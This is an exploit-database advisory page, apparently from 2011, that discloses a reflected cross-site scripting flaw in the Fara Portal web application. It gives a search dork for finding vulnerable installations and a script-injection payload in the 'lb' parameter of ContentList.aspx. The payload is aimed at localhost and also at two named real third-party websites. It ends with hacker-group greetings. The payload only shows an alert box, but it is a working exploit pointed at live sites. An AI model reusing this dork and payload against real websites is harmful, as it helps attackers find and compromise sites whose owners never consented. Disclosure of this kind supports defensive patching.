Fara Portal Cross Site Scripting (XSS) Vulnerability

2011-05-07 / 2011-05-08
Credit: 3H34N
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

#(+) Exploit Title: Fara Portal Cross Site Scripting (XSS) Vulnerability #(+) Author : 3H34N #(+) E-mail : Ehsan.Empire@Att.Net #(+) dork : "&#1601;&#1585;&#1575; &#1662;&#1585;&#1578;&#1575;&#1604;: &#1606;&#1587;&#1582;&#1607; 2.1" #(+) Version : All Ver #(+) Category : Web Apps [XSS] #(+) Platform : Tested on: Windows #(+) Download : http://www.fddit.com/ ____________________________________________________________________ ____________________________________________________________________ [~] Vulnerable File : # [+]http://localhost/ContentList.aspx?gid=2&lb=[XSS] [~] XSS Vulnerability # [+]http://localhost/ContentList.aspx?gid=2&lb=<script>alert('3H34N');</script> # [+]http://nezammohandesidelijan.com/ContentList.aspx?gid=2&lb=<script>alert('3H34N');</script> # [+]http://delijan.ir/ContentList.aspx?gid=2&lb=<script>alert('3H34N');</script> ____________________________________________________________________ ____________________________________________________________________ ######################################################################## (+)IRANIAN Young HackerZ # Persian Gulf (+)Black Hat Group Member : Net.Edit0r & DarkCoder & p3nt3st3r & H3x & 3H34N & D3adly #BHG (+)Sp My Best Friend : Net.Edit0r ^ BlackHat ~ Immortal Boy ~ Mr.Xhat~ Ashkan ..SkilleR.. ~ r3d.s3cur1ty ~ 4min ~ d3v1l.eyes ~ S3Ri0uS and all Friends (+)Gr33ts to : All Iranian HackerZ ########################################################################

References:

http://www.fddit.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top